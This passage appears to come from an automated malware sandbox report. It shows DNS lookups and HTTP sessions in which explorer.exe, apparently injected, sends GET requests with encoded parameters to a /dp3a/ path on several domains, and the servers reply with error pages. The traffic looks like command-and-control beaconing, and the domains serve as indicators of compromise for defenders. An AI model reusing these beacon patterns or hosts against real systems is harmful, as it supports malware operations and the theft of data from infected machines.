                                                                                                              Jun 10, 2021 14:37:13.711085081 CEST6194653192.168.2.38.8.8.8
                                                                                                              Jun 10, 2021 14:37:13.780498028 CEST53619468.8.8.8192.168.2.3
                                                                                                              Jun 10, 2021 14:37:14.248370886 CEST6491053192.168.2.38.8.8.8
                                                                                                              Jun 10, 2021 14:37:14.318262100 CEST53649108.8.8.8192.168.2.3
                                                                                                              Jun 10, 2021 14:37:18.494946957 CEST5212353192.168.2.38.8.8.8
                                                                                                              Jun 10, 2021 14:37:18.588766098 CEST53521238.8.8.8192.168.2.3
                                                                                                              Jun 10, 2021 14:37:22.024542093 CEST5613053192.168.2.38.8.8.8
                                                                                                              Jun 10, 2021 14:37:22.087380886 CEST53561308.8.8.8192.168.2.3
                                                                                                              Jun 10, 2021 14:37:23.745273113 CEST5633853192.168.2.38.8.8.8
                                                                                                              Jun 10, 2021 14:37:23.804264069 CEST53563388.8.8.8192.168.2.3
                                                                                                              Jun 10, 2021 14:37:28.858174086 CEST5942053192.168.2.38.8.8.8
                                                                                                              Jun 10, 2021 14:37:28.909409046 CEST53594208.8.8.8192.168.2.3
                                                                                                              Jun 10, 2021 14:37:34.027822971 CEST5878453192.168.2.38.8.8.8
                                                                                                              Jun 10, 2021 14:37:34.091212988 CEST53587848.8.8.8192.168.2.3
                                                                                                              Jun 10, 2021 14:37:39.291151047 CEST6397853192.168.2.38.8.8.8
                                                                                                              Jun 10, 2021 14:37:39.386704922 CEST53639788.8.8.8192.168.2.3

                                                                                                              DNS Queries

                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                              Jun 10, 2021 14:36:36.123982906 CEST192.168.2.38.8.8.80x81c1Standard query (0)www.allyexpense.comA (IP address)IN (0x0001)
                                                                                                              Jun 10, 2021 14:36:41.350483894 CEST192.168.2.38.8.8.80x183dStandard query (0)www.protectpursuit.comA (IP address)IN (0x0001)
                                                                                                              Jun 10, 2021 14:36:46.694658995 CEST192.168.2.38.8.8.80xbcdeStandard query (0)www.freshdeliciousberryfarm.comA (IP address)IN (0x0001)
                                                                                                              Jun 10, 2021 14:36:51.983397007 CEST192.168.2.38.8.8.80x6984Standard query (0)www.sw-advisers.comA (IP address)IN (0x0001)
                                                                                                              Jun 10, 2021 14:36:57.543658018 CEST192.168.2.38.8.8.80xb6b6Standard query (0)www.goldgrandpa.comA (IP address)IN (0x0001)
                                                                                                              Jun 10, 2021 14:37:02.747368097 CEST192.168.2.38.8.8.80xac4aStandard query (0)www.2dmaxximumrecords.comA (IP address)IN (0x0001)
                                                                                                              Jun 10, 2021 14:37:13.404011965 CEST192.168.2.38.8.8.80x389aStandard query (0)www.oilleakgames.comA (IP address)IN (0x0001)
                                                                                                              Jun 10, 2021 14:37:18.494946957 CEST192.168.2.38.8.8.80x5b1dStandard query (0)www.goldinsacks.comA (IP address)IN (0x0001)
                                                                                                              Jun 10, 2021 14:37:23.745273113 CEST192.168.2.38.8.8.80xbbbaStandard query (0)www.goodlukc.comA (IP address)IN (0x0001)
                                                                                                              Jun 10, 2021 14:37:28.858174086 CEST192.168.2.38.8.8.80x3010Standard query (0)www.growwithjenn.comA (IP address)IN (0x0001)
                                                                                                              Jun 10, 2021 14:37:34.027822971 CEST192.168.2.38.8.8.80xfb9dStandard query (0)www.bring-wellness.comA (IP address)IN (0x0001)
                                                                                                              Jun 10, 2021 14:37:39.291151047 CEST192.168.2.38.8.8.80x5366Standard query (0)www.topazsnacks.comA (IP address)IN (0x0001)

                                                                                                              DNS Answers

                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                              Jun 10, 2021 14:36:36.328604937 CEST8.8.8.8192.168.2.30x81c1Server failure (2)www.allyexpense.comnonenoneA (IP address)IN (0x0001)
                                                                                                              Jun 10, 2021 14:36:41.411506891 CEST8.8.8.8192.168.2.30x183dNo error (0)www.protectpursuit.comprotectpursuit.comCNAME (Canonical name)IN (0x0001)
                                                                                                              Jun 10, 2021 14:36:41.411506891 CEST8.8.8.8192.168.2.30x183dNo error (0)protectpursuit.com165.22.38.5A (IP address)IN (0x0001)
                                                                                                              Jun 10, 2021 14:36:46.762590885 CEST8.8.8.8192.168.2.30xbcdeNo error (0)www.freshdeliciousberryfarm.comfreshdeliciousberryfarm.comCNAME (Canonical name)IN (0x0001)
                                                                                                              Jun 10, 2021 14:36:46.762590885 CEST8.8.8.8192.168.2.30xbcdeNo error (0)freshdeliciousberryfarm.com34.102.136.180A (IP address)IN (0x0001)
                                                                                                              Jun 10, 2021 14:36:52.132129908 CEST8.8.8.8192.168.2.30x6984No error (0)www.sw-advisers.comsw-advisers.comCNAME (Canonical name)IN (0x0001)
                                                                                                              Jun 10, 2021 14:36:52.132129908 CEST8.8.8.8192.168.2.30x6984No error (0)sw-advisers.com157.245.232.77A (IP address)IN (0x0001)
                                                                                                              Jun 10, 2021 14:36:57.609603882 CEST8.8.8.8192.168.2.30xb6b6No error (0)www.goldgrandpa.comyummymeatballs.myshopify.comCNAME (Canonical name)IN (0x0001)
                                                                                                              Jun 10, 2021 14:36:57.609603882 CEST8.8.8.8192.168.2.30xb6b6No error (0)yummymeatballs.myshopify.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)
                                                                                                              Jun 10, 2021 14:36:57.609603882 CEST8.8.8.8192.168.2.30xb6b6No error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)
                                                                                                              Jun 10, 2021 14:37:02.922837019 CEST8.8.8.8192.168.2.30xac4aServer failure (2)www.2dmaxximumrecords.comnonenoneA (IP address)IN (0x0001)
                                                                                                              Jun 10, 2021 14:37:13.486615896 CEST8.8.8.8192.168.2.30x389aName error (3)www.oilleakgames.comnonenoneA (IP address)IN (0x0001)
                                                                                                              Jun 10, 2021 14:37:18.588766098 CEST8.8.8.8192.168.2.30x5b1dNo error (0)www.goldinsacks.com62.149.128.40A (IP address)IN (0x0001)
                                                                                                              Jun 10, 2021 14:37:23.804264069 CEST8.8.8.8192.168.2.30xbbbaName error (3)www.goodlukc.comnonenoneA (IP address)IN (0x0001)
                                                                                                              Jun 10, 2021 14:37:28.909409046 CEST8.8.8.8192.168.2.30x3010No error (0)www.growwithjenn.comgrowwithjenn.comCNAME (Canonical name)IN (0x0001)
                                                                                                              Jun 10, 2021 14:37:28.909409046 CEST8.8.8.8192.168.2.30x3010No error (0)growwithjenn.com160.153.136.3A (IP address)IN (0x0001)
                                                                                                              Jun 10, 2021 14:37:34.091212988 CEST8.8.8.8192.168.2.30xfb9dNo error (0)www.bring-wellness.combring-wellness.comCNAME (Canonical name)IN (0x0001)
                                                                                                              Jun 10, 2021 14:37:34.091212988 CEST8.8.8.8192.168.2.30xfb9dNo error (0)bring-wellness.com34.102.136.180A (IP address)IN (0x0001)
                                                                                                              Jun 10, 2021 14:37:39.386704922 CEST8.8.8.8192.168.2.30x5366No error (0)www.topazsnacks.comtopazsnacks.comCNAME (Canonical name)IN (0x0001)
                                                                                                              Jun 10, 2021 14:37:39.386704922 CEST8.8.8.8192.168.2.30x5366No error (0)topazsnacks.com135.181.180.74A (IP address)IN (0x0001)

                                                                                                              HTTP Request Dependency Graph

                                                                                                              • www.protectpursuit.com
                                                                                                              • www.freshdeliciousberryfarm.com
                                                                                                              • www.sw-advisers.com
                                                                                                              • www.goldgrandpa.com
                                                                                                              • www.goldinsacks.com
                                                                                                              • www.growwithjenn.com
                                                                                                              • www.bring-wellness.com

                                                                                                              HTTP Packets

                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              0192.168.2.349735165.22.38.580C:\Windows\explorer.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Jun 10, 2021 14:36:41.543024063 CEST1430OUTGET /dp3a/?rTWxa=fFin23A3InOxv8Q1OZSqiWR/FjS3KuFpXPcC+roY+PuFOGx4uYNLJpybUr51Ny74Rks0&qXtd=VpFTeL6xRNZ0stZ0 HTTP/1.1
                                                                                                              Host: www.protectpursuit.com
                                                                                                              Connection: close
                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                              Data Ascii:
                                                                                                              Jun 10, 2021 14:36:41.674711943 CEST1430INHTTP/1.1 404 Not Found
                                                                                                              Server: nginx/1.18.0
                                                                                                              Date: Thu, 10 Jun 2021 12:36:41 GMT
                                                                                                              Content-Length: 0
                                                                                                              Connection: close
                                                                                                              Vary: Origin


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              1192.168.2.34974134.102.136.18080C:\Windows\explorer.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Jun 10, 2021 14:36:46.806513071 CEST3358OUTGET /dp3a/?qXtd=VpFTeL6xRNZ0stZ0&rTWxa=DH0B3lUhAa5VBPw8nCCOXpLU24maY23yGmrt22qj0kvQjGAaKYYXdT0Mh/TRCK5k4cmX HTTP/1.1
                                                                                                              Host: www.freshdeliciousberryfarm.com
                                                                                                              Connection: close
                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                              Data Ascii:
                                                                                                              Jun 10, 2021 14:36:46.947381020 CEST3359INHTTP/1.1 403 Forbidden
                                                                                                              Server: openresty
                                                                                                              Date: Thu, 10 Jun 2021 12:36:46 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 275
                                                                                                              ETag: "60ba413e-113"
                                                                                                              Via: 1.1 google
                                                                                                              Connection: close
                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              2192.168.2.349743157.245.232.7780C:\Windows\explorer.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Jun 10, 2021 14:36:52.333302975 CEST3392OUTGET /dp3a/?rTWxa=76AMkVxxuSKB5pgh4RNc3EipO3rbFW8MEUNJys/eLa/AxdTMjRac1XeBowoP/wZORJRk&qXtd=VpFTeL6xRNZ0stZ0 HTTP/1.1
                                                                                                              Host: www.sw-advisers.com
                                                                                                              Connection: close
                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                              Data Ascii:
                                                                                                              Jun 10, 2021 14:36:52.531318903 CEST3393INHTTP/1.1 301 Moved Permanently
                                                                                                              Server: nginx
                                                                                                              Date: Thu, 10 Jun 2021 12:36:52 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 162
                                                                                                              Connection: close
                                                                                                              Location: https://www.sw-advisers.com/dp3a/?rTWxa=76AMkVxxuSKB5pgh4RNc3EipO3rbFW8MEUNJys/eLa/AxdTMjRac1XeBowoP/wZORJRk&qXtd=VpFTeL6xRNZ0stZ0
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              3192.168.2.34974423.227.38.7480C:\Windows\explorer.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Jun 10, 2021 14:36:57.655556917 CEST3394OUTGET /dp3a/?qXtd=VpFTeL6xRNZ0stZ0&rTWxa=GkWHDDYMiWr4Ju0U4teKyAR8hKcpKlGmV2ZHyKwA/bXhSAEvQCtqjiLuXtjyxk2BGjrR HTTP/1.1
                                                                                                              Host: www.goldgrandpa.com
                                                                                                              Connection: close
                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                              Data Ascii:
                                                                                                              Jun 10, 2021 14:36:57.730741024 CEST3395INHTTP/1.1 403 Forbidden
                                                                                                              Date: Thu, 10 Jun 2021 12:36:57 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              X-Sorting-Hat-PodId: 170
                                                                                                              X-Sorting-Hat-ShopId: 39696531622
                                                                                                              X-Dc: gcp-europe-west1
                                                                                                              X-Request-ID: b1326e52-2a8e-4175-b0a0-a109297b2ed1
                                                                                                              X-Permitted-Cross-Domain-Policies: none
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              X-Download-Options: noopen
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                              cf-request-id: 0a97860cd800004ec8d8bd6000000001
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 65d2a5f489974ec8-FRA
                                                                                                              alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                              Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30
                                                                                                              Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0
                                                                                                              Jun 10, 2021 14:36:57.730763912 CEST3397INData Raw: 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 74 65 78 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 6d 61 69 6e 7b 66 6c 65 78 3a 31 3b
                                                                                                              Data Ascii: ;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6r
                                                                                                              Jun 10, 2021 14:36:57.730776072 CEST3398INData Raw: c3 aa 20 6e c3 a3 6f 20 74 65 6d 20 70 65 72 6d 69 73 73 c3 a3 6f 20 70 61 72 61 20 61 63 65 73 73 61 72 20 65 73 74 65 20 73 69 74 65 22 0a 20 20 7d 2c 0a 20 20 22 65 73 22 3a 20 7b 0a 20 20 20 20 22 74 69 74 6c 65 22 3a 20 22 41 63 63 65 73 6f
                                                                                                              Data Ascii: no tem permisso para acessar este site" }, "es": { "title": "Acceso denegado", "content-title": "No tienes permiso para acceder a esta pgina web" }, "ko": { "title": " ", "content-title": "
                                                                                                              Jun 10, 2021 14:36:57.730788946 CEST3399INData Raw: 0a 20 20 7d 2c 0a 20 20 22 68 69 22 3a 20 7b 0a 20 20 20 20 22 74 69 74 6c 65 22 3a 20 22 e0 a4 aa e0 a4 b9 e0 a5 81 e0 a4 82 e0 a4 9a 20 e0 a4 85 e0 a4 b8 e0 a5 8d e0 a4 b5 e0 a5 80 e0 a4 95 e0 a5 83 e0 a4 a4 22 2c 0a 20 20 20 20 22 63 6f 6e 74
                                                                                                              Data Ascii: }, "hi": { "title": " ", "content-title": " "
                                                                                                              Jun 10, 2021 14:36:57.730799913 CEST3400INData Raw: 74 72 79 20 63 6f 64 65 0a 20 20 74 72 61 6e 73 6c 61 74 69 6f 6e 73 20 3d 20 74 5b 6c 61 6e 67 75 61 67 65 5d 20 7c 7c 20 74 5b 22 65 6e 22 5d 3b 0a 20 20 2f 2f 20 52 65 70 6c 61 63 65 20 63 6f 6e 74 65 6e 74 20 6f 6e 20 73 63 72 65 65 6e 0a 20
                                                                                                              Data Ascii: try code translations = t[language] || t["en"]; // Replace content on screen for (var id in translations) { target = document.querySelector("[data-i18n=" + id + "]"); if (target != undefined) { target.innerHTML = translatio
                                                                                                              Jun 10, 2021 14:36:57.730808020 CEST3400INData Raw: 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              4192.168.2.34974762.149.128.4080C:\Windows\explorer.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Jun 10, 2021 14:37:18.660567999 CEST3418OUTGET /dp3a/?qXtd=VpFTeL6xRNZ0stZ0&rTWxa=2EHAYBF9OrZScLBFfnY/kB1lNYuVodkTQi7ynUSvkYXlrnDKiUoE/Bv6J35YIy7pKLvP HTTP/1.1
                                                                                                              Host: www.goldinsacks.com
                                                                                                              Connection: close
                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                              Data Ascii:
                                                                                                              Jun 10, 2021 14:37:18.730734110 CEST3420INHTTP/1.1 404 Not Found
                                                                                                              Cache-Control: private
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Server: Microsoft-IIS/8.5
                                                                                                              X-Powered-By: ASP.NET
                                                                                                              Date: Thu, 10 Jun 2021 12:37:18 GMT
                                                                                                              Connection: close
                                                                                                              Content-Length: 5049
                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 38 2e 35 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 7d 20 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 20 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 35 70 78 20
                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 8.5 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.4em;margin:10px 0 0 0;color:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px
                                                                                                              Jun 10, 2021 14:37:18.730801105 CEST3421INData Raw: 30 3b 20 0a 7d 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74
                                                                                                              Data Ascii: 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;background-color:#5C87B2; }#content{margin:0 0 0 2%;position:relative;} .summary-container,.content-container{background:
